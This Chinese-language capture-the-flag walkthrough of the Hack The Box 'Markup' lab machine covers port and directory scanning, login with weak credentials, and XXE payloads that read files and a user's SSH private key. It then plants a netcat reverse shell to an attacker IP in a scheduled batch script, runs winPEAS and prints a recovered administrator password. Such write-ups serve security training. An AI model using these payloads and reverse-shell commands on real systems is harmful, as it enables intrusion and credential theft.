HTB Markup writeup（弱口令登录常尝试，CMD文本最兼容）

大佬请忽略！

Markup攻击点：
一：弱口令登录

二：XXE注入

三：CMD最简单兼容

信息收集

nmap

└─$ nmap -p- --min-rate100010.129.95.192 Starting Nmap7.95(https://nmap.org)at2025-09-24 09:01 CST Nmap scan reportfor10.129.95.192 Host is up(0.33s latency). Not shown:65532filtered tcp ports(no-response)PORT STATE SERVICE22/tcpopenssh80/tcpopenhttp443/tcpopenhttps Nmap done:1IP address(1hostup)scannedin132.86seconds

└─$ nmap -p22,80,443 -sC -sV --min-rate100010.129.95.192 Starting Nmap7.95(https://nmap.org)at2025-09-24 09:05 CST Nmap scan reportfor10.129.95.192 Host is up(0.35s latency). PORT STATE SERVICE VERSION22/tcpopensshOpenSSH for_Windows_8.1(protocol2.0)|ssh-hostkey:|30729f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f(RSA)|25690:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97(ECDSA)|_256f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81(ED25519)80/tcpopenhttp Apache httpd2.4.41((Win64)OpenSSL/1.1.1c PHP/7.2.28)|_http-title: MegaShopping|http-cookie-flags:|/:|PHPSESSID:|_ httponly flag notset|_http-server-header: Apache/2.4.41(Win64)OpenSSL/1.1.1c PHP/7.2.28443/tcpopenssl/http Apache httpd2.4.41((Win64)OpenSSL/1.1.1c PHP/7.2.28)|_http-title: MegaShopping|_http-server-header: Apache/2.4.41(Win64)OpenSSL/1.1.1c PHP/7.2.28|tls-alpn:|_ http/1.1|http-cookie-flags:|/:|PHPSESSID:|_ httponly flag notset|_ssl-date: TLS randomness does not representtime|ssl-cert: Subject:commonName=localhost|Not valid before:2009-11-10T23:48:47|_Not valid after:2019-11-08T23:48:47 Service detection performed. Please report any incorrect results at https://nmap.org/submit/.Nmap done:1IP address(1hostup)scannedin34.99seconds

靶机开放ssh服务22端口，http服务80和443端口。操作系统是Win64，后台服务是PHP/7.2.28。

http

通过测试发现80端口和443端口开放的是同样的服务，没有域名。

gobuster

└─$ gobusterdir-u http://10.129.95.192/ -t100-o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php===============================================================Gobuster v3.6 by OJ Reeves(@TheColonial)&Christian Mehlmauer(@firefart)===============================================================[+]Url: http://10.129.95.192/[+]Method: GET[+]Threads:100[+]Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt[+]Negative Status codes:404[+]User Agent: gobuster/3.6[+]Extensions: php[+]Timeout: 10s===============================================================Starting gobusterindirectory enumeration mode===============================================================/contact.php(Status:302)[Size:110][-->/index.php]/images(Status:301)[Size:340][-->http://10.129.95.192/images/]/db.php(Status:200)[Size:0]/about.php(Status:302)[Size:108][-->/index.php]/home.php(Status:302)[Size:107][-->/index.php]/webalizer(Status:403)[Size:1046]/products.php(Status:302)[Size:111][-->/index.php]/Images(Status:301)[Size:340][-->http://10.129.95.192/Images/]/services.php(Status:302)[Size:111][-->/index.php]/index.php(Status:200)[Size:12100]/phpmyadmin(Status:403)[Size:1205]/Services.php(Status:302)[Size:111][-->/index.php]/examples(Status:503)[Size:1060]/Home.php(Status:302)[Size:107][-->/index.php]/Products.php(Status:302)[Size:111][-->/index.php]/process.php(Status:302)[Size:110][-->/index.php]/About.php(Status:302)[Size:108][-->/index.php]/Contact.php(Status:302)[Size:110][-->/index.php]/DB.php(Status:200)[Size:0]/IMAGES(Status:301)[Size:340][-->http://10.129.95.192/IMAGES/]/licenses(Status:403)[Size:1205]/server-status(Status:403)[Size:1205]/Index.php(Status:200)[Size:12100]/con.php(Status:403)[Size:1046]/con(Status:403)[Size:1046]/HOME.php(Status:302)[Size:107][-->/index.php]/aux.php(Status:403)[Size:1046]/aux(Status:403)[Size:1046]/ABOUT.php(Status:302)[Size:108][-->/index.php]/CONTACT.php(Status:302)[Size:110][-->/index.php]/PRODUCTS.php(Status:302)[Size:111][-->/index.php]/Process.php(Status:302)[Size:110][-->/index.php]/Db.php(Status:200)[Size:0]/PROCESS.php(Status:302)[Size:110][-->/index.php]/prn.php(Status:403)[Size:1046]/prn(Status:403)[Size:1046]/server-info(Status:403)[Size:1205]Progress:59998/60000(100.00%)===============================================================Finished===============================================================

没有泄露其他有价值信息。

Shell as Daniel

XXE

XXE（XML External Entity Injection，XML外部实体注入）是一种针对处理XML输入的应用程序的漏洞，发生在服务器端解析用户提交的XML数据时，未正确禁用或限制外部实体引用。XXE漏洞源于XML解析器未限制外部实体引用，允许攻击者读取文件、扫描内网、执行DoS攻击或结合其他漏洞进一步利用。其危害包括敏感信息泄露、SSRF、DoS甚至代码执行。利用方法包括构造恶意XML读取文件、触发SSRF或执行盲XXE，工具如Burp Suite、Nmap可辅助测试。防御需禁用外部实体、过滤输入、限制网络访问和更新解析器。

使用弱口令密码admin:password尝试登录web服务，登录成功。
弱口令列表

admin:admin administrator:administrator admin:administrator admin:password administrator:password

通过测试发现Order存在xxe漏洞。

页面源代码泄露用户信息：Daniel。

POC

<?xml version = "1.0"?><!DOCTYPEfoo[<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">]><order><quantity>&xxe;</quantity><item>&xxe;</item><address>&xxe;</address></order>

exploit，获取Daniel ssh私钥。

<?xml version = "1.0"?><!DOCTYPEfoo[<!ENTITY xxe SYSTEM "file:///C:/users/Daniel/.ssh/id_rsa">]><order><quantity>&xxe;</quantity><item>&xxe;</item><address>&xxe;</address></order>

保存私钥到kali，ssh登录。

chmod600id_rsa

sshdaniel@10.129.95.192 -i id_rsa

Shell as administrator

方式一：定时任务

This worked after a lot of retries. Run the command outside the PowerShell (use theexitcommand to get out of PowerShell).不要使用powershell创建定时任务脚本。
CMD 下创建最简单兼容；PowerShell 下必须显式指定 -Encoding ascii/oem，否则默认 Unicode 会导致脚本无法执行。

检查是否存在非系统文件或文件夹，Log-Management

daniel@MARKUP C:\Users\daniel\Desktop>cd \ daniel@MARKUP C:\>dir Volume in drive C has no label. Volume Serial Number is BA76-B4E3 Directory of C:\ 10/14/2025 12:41 AM <DIR> Log-Management 09/15/2018 12:12 AM <DIR> PerfLogs 07/28/2021 02:01 AM <DIR> Program Files 09/15/2018 12:21 AM <DIR> Program Files (x86) 07/28/2021 03:38 AM 0 Recovery.txt 03/05/2020 05:40 AM <DIR> Users 07/28/2021 02:16 AM <DIR> Windows 03/05/2020 10:15 AM <DIR> xampp 1 File(s) 0 bytes 7 Dir(s) 7,375,269,888 bytes free

发现定时任务脚本job.bat，检查脚本的权限，用户daniel具有完全控制权限。

daniel@MARKUP C:\Log-Management>dir Volume in drive C has no label. Volume Serial Number is BA76-B4E3 Directory of C:\Log-Management 10/14/2025 12:53 AM <DIR> . 10/14/2025 12:53 AM <DIR> .. 03/06/2020 02:42 AM 346 job.bat 1 File(s) 346 bytes 2 Dir(s) 7,381,422,080 bytes free

job,bat脚本内容：只有管理员才可以执行这个脚本。

daniel@MARKUP C:\Log-Management>type job.bat @echo off FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V IF (%adminTest%)==(Access) goto noAdmin for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G") echo. echo Event Logs have been cleared! goto theEnd :do_clear wevtutil.exe cl %1 goto :eof :noAdmin echo You must run this script as an Administrator! :theEnd exit

job.bat脚本权限

daniel@MARKUP C:\Log-Management>icacls job.bat job.bat NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) MARKUP\daniel:(I)(F) Successfully processed 1 files; Failed processing 0 files

用户权限。

daniel@MARKUP C:\Log-Management>whoami /all USER INFORMATION ---------------- User Name SID ============= ============================================= markup\daniel S-1-5-21-103432172-3528565615-2854469147-1000 GROUP INFORMATION ----------------- Group Name Type SID Attributes ====================================== ================ ============================================= ======================= =========================== Everyone Well-known group S-1-1-0 Mandatory group, Enable d by default, Enabled group MARKUP\Web Admins Alias S-1-5-21-103432172-3528565615-2854469147-1001 Mandatory group, Enable d by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enable d by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enable d by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enable d by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enable d by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enable d by default, Enabled group NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enable d by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enable d by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

使用cmd命令行生成新的job.bat脚本，获取反弹shell。

下载nc64.exe到kali，上传到靶机。

https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe

daniel@MARKUP C:\Log-Management>powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Log-Management> wget http://10.10.16.9/nc64.exe -outfile nc64.exe

PSC:\Log-Management>dirDirectory: C:\Log-Management Mode LastWriteTime Length Name----------------------------a----3/6/2020 1:42 AM 346 job.bat-a----10/14/2025 1:04 AM 45272 nc64.exe

在cmd命令行下生成新的job.bat

PS C:\Log-Management> exit daniel@MARKUP C:\Log-Management>echo C:\Log-Management\nc64.exe -e c md.exe 10.10.16.9 9000 > C:\Log-Management\job.bat daniel@MARKUP C:\Log-Management>type job.bat C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.9 9000

方式二：信息收集

kali启动http服务，下载winPEASx64.exe到靶机。

└─$ python -m http.server80Serving HTTP on0.0.0.0 port80(http://0.0.0.0:80/)...10.129.95.192 - -[25/Sep/202511:32:56]"GET /winPEASx64.exe HTTP/1.1"200-

daniel@MARKUP C:\Users\daniel\Desktop>powershell Windows PowerShell Copyright(C)Microsoft Corporation. All rights reserved. PS C:\Users\daniel\Desktop>wgethttp://10.10.16.4/winPEASx64.exe -outfile winPEASx64.exe

执行winPEASx64.exe收集服务端信息，获取管理员用户密码。

PS C:\Users\daniel\Desktop>.\winPEASx64.exe...[snip]... +----------¦ LookingforAutoLogon credentials Some AutoLogon credentials were found DefaultUserName:Administrator DefaultPassword:Yhk}QE&j<3M...[snip]...

管理用户登录

└─$sshadministrator@10.129.95.192 administrator@10.129.95.192's password: Microsoft Windows[Version10.0.17763.107](c)2018Microsoft Corporation. All rights reserved. administrator@MARKUP C:\Users\Administrator>whoami markup\administrator